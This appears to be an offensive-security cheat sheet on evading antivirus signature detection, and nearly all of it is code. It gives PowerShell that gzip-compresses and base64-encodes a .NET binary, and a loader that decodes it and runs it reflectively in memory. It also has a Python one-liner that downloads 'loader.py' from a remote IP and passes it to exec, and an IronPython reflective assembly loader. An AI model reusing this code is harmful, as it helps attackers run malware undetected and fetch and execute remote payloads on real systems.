A way to bypass AV signature analysis: you can gzip-compress and base64-encode a .NET assembly to load it reflectively via PowerShell right from memory (when compiling the binary, make Program
class and its Main
method public ):
CompressEncodeAssembly.ps1
Copy $bytes = [ System.IO.File ]::ReadAllBytes( " $ (pwd) \binary.exe" )
[ System.IO.MemoryStream ] $outStream = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream($outStream, [System.IO.Compression.CompressionMode]::Compress)
$gzipStream.Write($bytes , 0 , $bytes.Length)
$gzipStream.Close()
$outStream.Close()
[ byte []] $outBytes = $outStream.ToArray()
$b64Zipped = [ System.Convert ]::ToBase64String($outBytes)
$b64Zipped | Out-File - NoNewLine - Encoding ASCII .\b64.txt
notepad.exe .\b64.txt
An example how the binary can be actually decoded, decompressed and run from memory:
Copy function Invoke-S0m3B1n4ry
{
#[CmdletBinding()]
#Param([String]$Command = " ")
$a = New-Object System.IO.MemoryStream( , [ System.Convert ]::FromBase64String( "..." ))
$b = New-Object System.IO.Compression.GZipStream($a , [ System.IO.Compression.CompressionMode ]::Decompress)
$c = New-Object System.IO.MemoryStream;
$b.CopyTo($c)
[ byte []]$d = $c.ToArray()
$e = [ System.Reflection.Assembly ]::Load($d)
$f = [ System.Console ]::Out
$g = New-Object System.IO.StringWriter
[ System.Console ]::SetOut($g)
$h = [ Reflection.BindingFlags ] "Public,NonPublic,Static"
$i = $e.GetType( "S0m3B1n4ry.Program" , $h)
$j = $i.GetMethod( "Main" , $h)
$j.Invoke( $null , ( , [ string []] $args ))
#$i = [S0m3B1n4ry.Program]::Main($Command.Split())
[ System.Console ]::SetOut($f)
$k = $g.ToString()
$k
}
Copy >>> import urllib . request
>>> request = urllib . request . Request ( 'http://10.10.13.37/loader.py' )
>>> result = urllib . request . urlopen (request)
>>> payload = result . read ()
>>> exec (payload)
Copy import clr
import zlib
import base64
clr . AddReference ( 'System' )
from System import *
from System . Reflection import *
b64 = base64 . b64encode (zlib. decompress (base64. b64decode (b '<LOADER_BYTES_B64>' ))). decode ()
raw = Convert . FromBase64String (b64)
assembly = Assembly . Load (raw)
type = assembly . GetType ( 'Loader.Program' )
type . GetMethod ( 'Main' ). Invoke (Activator. CreateInstance ( type ), None )